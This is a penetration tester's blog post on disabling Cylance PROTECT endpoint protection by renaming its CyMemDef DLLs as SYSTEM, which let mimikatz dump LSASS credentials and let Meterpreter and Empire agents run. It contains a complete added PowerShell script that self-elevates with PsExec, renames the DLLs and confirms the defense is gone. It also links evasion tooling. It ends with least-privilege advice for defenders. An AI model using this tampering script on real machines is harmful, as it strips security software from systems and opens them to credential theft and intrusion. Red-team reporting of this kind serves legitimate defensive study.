During a penetration test, I had encountered some issues with Cylance PROTECT snagging a lot of my tooling (both public and private). After a bit of research and some client misconfiguration elsewhere, I was able to find a way to disable Cylance PROTECT.
I will state that the method I’m using isn’t all that novel and is most likely a known issue to many folks both inside and outside of Cylance.
During my quest for Domain Admin, I had obtained Local Administrative rights to several machines within my target environment. Cylance PROTECT was not stopping me from running malware through things like https://github.com/Genetic-Malware/Ebowla. However, it was preventing mimikatz from accessing LSASS.
I had tried to:
- stop the Cylance service (both as a Local Admin and as NT SYSTEM) directly and was denied.
- kill the Cylance PROTECT process outright.
- run CyDuck https://github.com/xorrior/Random-CSharpTools/tree/master/CyDuck. Cylance appears to have a signature for this tool, and various levels of obfuscation either weren’t working or were getting caught.
I decided to dig into xorrior’s research a bit further https://www.xorrior.com/You-Have-The-Right-to-Remain-Cylance/ and found some of his knowledge on the subject interesting:
> Cylance also utilizes a filter driver that is responsible for injecting the memory exploitation defense library (CyMemDef) into every new process.
It was then that I took an alternate path and decided to manually manipulate the CyMemDef.dll/CyMemDef64.dll files directly to see if that would disable/break the CylanceSvc temporarily for the assessment.
- With Local Admin access, I used PsExec64.exe to spawn a shell as NT AUTHORITY\SYSTEM
- I renamed C:\Program Files\Cylance\Desktop\CyMemDef64.dll to C:\Program Files\Cylance\Desktop\CyMemDef64.dll.bak
As soon as the .dll was renamed I was able to leverage mimikatz to dump cleartext credentials from LSASS. I was also able to run vanilla Empire and Meterpreter agents. This was all really cool, but I wanted to work on doing this process programmatically. (No PoC available at the moment. Sorry!)
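The two manual steps above (get a SYSTEM shell with PsExec64, then rename the CyMemDef DLL) written out as a PowerShell script, with a restore switch and a check that new processes really do start without the library. This is an added example, not the author's PoC and not Cylance code. It assumes PsExec64.exe is on PATH, the default install path named above, and that it is launched from an elevated (Local Admin) shell; the `-Restore` switch, the `$CylanceDir` parameter and the notepad.exe test process are illustrative choices of mine.

```powershell
# Added example: scripted version of the manual CyMemDef rename described in the post.
# Assumptions (not from the original post): PsExec64.exe is on PATH, Cylance lives in the
# default directory below, and this runs from an elevated (Local Admin) PowerShell.
param(
    [switch]$Restore,
    [string]$CylanceDir = 'C:\Program Files\Cylance\Desktop'
)

# Both the 32-bit and 64-bit memory-defense libraries mentioned in the post.
$dlls = @('CyMemDef64.dll', 'CyMemDef.dll') | ForEach-Object { Join-Path $CylanceDir $_ }

# The rename has to be done as NT AUTHORITY\SYSTEM; a Local Admin token alone is
# denied. If we are not SYSTEM yet, re-launch this same script under PsExec64 -s.
$me = [Security.Principal.WindowsIdentity]::GetCurrent().Name
if ($me -ne 'NT AUTHORITY\SYSTEM') {
    $psexecArgs = @('-accepteula', '-s', 'powershell.exe', '-ExecutionPolicy', 'Bypass',
                    '-File', $PSCommandPath, '-CylanceDir', $CylanceDir)
    if ($Restore) { $psexecArgs += '-Restore' }
    & PsExec64.exe @psexecArgs
    exit $LASTEXITCODE
}

if ($Restore) {
    # Put the DLLs back so the client is not left without memory-exploitation defense.
    foreach ($dll in $dlls) {
        $backup = "$dll.bak"
        if (Test-Path $backup) {
            Rename-Item -Path $backup -NewName (Split-Path $dll -Leaf) -Force
            Write-Host "[+] Restored $dll"
        } else {
            Write-Host "[-] No backup found at $backup"
        }
    }
    exit 0
}

foreach ($dll in $dlls) {
    if (-not (Test-Path $dll)) { Write-Host "[-] $dll not found, skipping"; continue }
    Rename-Item -Path $dll -NewName ((Split-Path $dll -Leaf) + '.bak') -Force
    Write-Host "[+] Renamed $dll -> $dll.bak"
}

# Verification: the filter driver injects CyMemDef into every new process, so a
# process spawned *after* the rename should no longer have the module loaded.
$p = Start-Process -FilePath 'notepad.exe' -PassThru
Start-Sleep -Seconds 2
$loaded = $p.Modules | Where-Object { $_.ModuleName -like 'CyMemDef*' }
Stop-Process -Id $p.Id -Force
if ($loaded) {
    Write-Host "[-] CyMemDef is still injected into new processes: $($loaded.ModuleName -join ', ')"
    exit 1
} else {
    Write-Host "[+] New processes start without CyMemDef"
}
```

Run it once to disable, and again with `-Restore` before wrapping up the engagement; the module check only tells you about processes created after the rename, since anything already running was injected at start-up and keeps its copy of the library.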
I don’t think that Cylance is directly at fault here, but I wonder if they could develop some solution to the problem.
What organizations that use Cylance will really have to do is follow industry-standard best practices: practice and enforce least privilege for their users, and remove Local Administrative rights from Domain Users and other non-administrative accounts.